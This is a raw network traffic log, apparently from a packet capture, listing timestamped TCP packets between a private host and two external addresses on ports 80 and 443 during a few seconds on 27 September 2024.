Sep 27, 2024 17:42:04.104906082 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104916096 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104944944 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140346050 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140382051 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140431881 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140482903 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140484095 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140516996 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140527010 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140549898 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140571117 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140583038 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140598059 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140615940 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140630960 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140649080 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140674114 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140722036 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140724897 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140768051 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140790939 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140837908 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140840054 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140872002 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140887022 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140917063 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140921116 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140953064 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.140961885 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.140984058 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141009092 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141024113 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141032934 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141064882 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141077995 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141099930 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141108036 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141132116 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141144037 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141164064 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141171932 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141196012 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141206026 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141230106 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141241074 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141263008 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141277075 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141305923 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141314983 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141347885 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141355991 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141388893 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141396999 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141428947 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141453028 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141460896 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141477108 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141494036 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141505957 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141525984 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141549110 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141572952 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141576052 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141609907 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141621113 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141644001 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141660929 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141676903 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141689062 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141721964 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141727924 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141778946 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141781092 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141810894 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141828060 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141844034 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141850948 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141875982 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141887903 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141910076 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141925097 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.141942024 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.141952038 CEST  49737  80     192.168.2.4     185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.141976118 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.141994953 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142007113 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142021894 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142040968 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142049074 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142070055 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142091036 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142102957 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142118931 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142149925 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142165899 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142183065 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142199993 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142214060 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142231941 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142242908 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142266035 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142292023 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142298937 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142313004 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142332077 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142343044 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142364025 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142373085 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142400980 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142407894 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142433882 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142441988 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142466068 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142474890 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142498970 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142508030 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142529964 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142543077 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142560959 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142573118 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142592907 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142605066 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142625093 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142637968 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142657995 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142669916 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142689943 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142708063 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142723083 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142735004 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142755032 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142767906 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142787933 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142801046 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142819881 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142832994 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142853975 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142863035 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142887115 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142904043 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142920017 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142929077 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142955065 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142961979 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142988920 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143001080 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143021107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143029928 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143055916 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143069029 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143089056 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143100977 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143121004 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143131971 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143150091 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143162966 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143182039 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143199921 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143223047 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143232107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143264055 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143282890 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143296003 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143311977 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143326998 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143337965 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143358946 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143373013 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143408060 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143410921 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143443108 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143455982 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143477917 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143485069 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143510103 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143518925 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143542051 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143553972 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143585920 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143598080 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143618107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143630981 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143651009 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143659115 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143682957 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143711090 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143714905 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143732071 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143743038 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143759012 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143774986 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143786907 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143811941 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143829107 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143845081 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143856049 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143877029 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143886089 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143909931 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143919945 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143943071 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143950939 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143975973 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143990993 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.144021034 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265363932 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265373945 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265398026 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265408993 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265430927 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265440941 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265464067 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265474081 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265511990 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.942796946 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.943214893 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.047447920 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.047992945 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.048221111 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.048675060 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.050074100 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.050112963 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.050189018 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.050443888 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.051907063 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.051918983 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.055258036 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.513871908 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.514197111 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.515856028 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.515866995 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.516182899 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.570457935 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.615396976 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.763284922 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.763405085 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.879462004 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.879822969 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.884676933 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.884809017 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.884915113 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.885025024 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.885186911 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.890058041 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.947041988 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.947135925 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.947376966 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.949007988 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.949007988 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.949023962 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.949033976 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.189908028 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.189975023 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.190421104 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.210959911 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.210988045 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.584541082 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.585270882 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.586177111 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.590985060 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.671725988 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.671833992 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.673347950 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.673358917 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.673600912 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.677253008 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.719412088 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.810822010 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.812407017 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.926384926 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.926753044 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.931606054 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.931714058 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.931754112 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.931806087 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.931915045 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.936759949 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.081496954 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.081587076 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.081625938 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.105959892 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.105998039 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.727390051 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.727426052 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.727494955 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.727813959 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.727827072 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.959161997 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.959292889 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:07.959450960 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.959506035 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:07.960340977 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:07.965157986 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.188471079 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.188548088 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.301542044 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.302011013 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.306701899 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.306752920 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.306952000 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.307816029 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.307951927 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.312736034 CEST8049746185.215.113.16192.168.2.4
